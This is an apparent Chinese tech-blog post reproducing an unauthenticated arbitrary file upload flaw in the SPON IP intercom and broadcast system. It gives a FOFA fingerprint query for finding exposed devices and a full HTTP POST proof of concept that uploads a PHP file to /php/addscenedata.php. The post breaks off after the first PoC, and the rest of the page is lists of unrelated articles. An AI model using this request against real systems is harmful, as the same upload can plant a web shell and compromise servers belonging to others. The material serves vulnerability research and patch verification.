SPON世邦 IP网络对讲广播系统 多处文件上传漏洞复现

  • 开发
  • 45

0x01 产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

0x02 漏洞概述

SPON世邦IP网络对讲广播系统 addscenedata.php、uploadjson.php、my_parser.php等接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

0x03 复现环境

FOFA:icon_hash="-1830859634"

0x04 漏洞复现

PoC-1

POST /php/addscenedata.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip

------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
--
阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-01-09 10:28:02       16 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-09 10:28:02       16 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-09 10:28:02       15 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-09 10:28:02       18 阅读

热门阅读

  8. 服务初心,专业确保——服装采购标书的制作与优化

    2024-01-09 10:28:02       33 阅读

  9. 站长工具之PHP单文件实现IP归属地批量查询

    2024-01-09 10:28:02       31 阅读

  10. Kafka内外网访问

    2024-01-09 10:28:02       39 阅读

  11. 文本分析之词云图的绘制

    2024-01-09 10:28:02       35 阅读

  12. 编程语言的新趋势

    2024-01-09 10:28:02       38 阅读

  13. Python数据可视化交互式HvPlot库

    2024-01-09 10:28:02       34 阅读

  18. [设计模式 Go实现] 结构型~享元模式

    2024-01-09 10:28:02       37 阅读

  21. js实现点击音频实现播放功能

    2024-01-09 10:28:02       39 阅读

  24. Serverless与Kubernetes(K8s)的区别、优缺点及应用场景

    2024-01-09 10:28:02       33 阅读

  29. Ceph源码分析-在C++中,符号“&“和“*“有不同的用法。

    2024-01-09 10:28:02       52 阅读